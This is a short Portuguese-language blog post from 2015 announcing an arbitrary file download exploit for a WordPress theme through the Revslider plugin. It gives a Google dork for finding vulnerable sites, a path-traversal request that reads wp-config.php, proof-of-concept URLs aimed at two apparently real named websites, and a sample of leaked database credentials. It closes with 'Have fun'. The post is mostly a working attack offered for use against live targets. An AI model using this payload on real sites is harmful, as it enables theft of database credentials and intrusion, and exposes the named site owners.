quarta-feira, 21 de janeiro de 2015

WordPress Ultimate Theme Arbitrary File Download

  1. # WordPress Ultimate Theme Arbitrary File Download
  2. # Risco: Alto
  3. # Número CWE: CWE-200
  4. # Autor: Hugo Santiago
  5. # Contato: hugo.s@linuxmail.org
  6. # Data: 31/08/2014
  7. # Vendedor Homepage: http://www.techerhut.com/download-x-v1-7-5-the-ultimate-wordpress-theme-themeforest/
  8. # Testado em: Windows 7 and Gnu/Linux
  9. # Google Dork: "Index of"  +/wp-content/themes/ultimate/
  10. # Patch vul : /wp-content/themes/ultimate/
  11. # Exploit(Revslide):
  • http://vitima/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC :
  • http://iai.pt/wp/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • http://www.wanderlogic.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Exemplo config.php
  • define('DB_USER', 'admincom1');
  • define('DB_PASSWORD', '!J5XnVsc%');
  • define('DB_HOST', 'mysql.admincom.com.br');
Have fun

Imagem Ilustrativa

Marcadores: , ,

0 comentários:

Postar um comentário

Assinar: Postar comentários (Atom)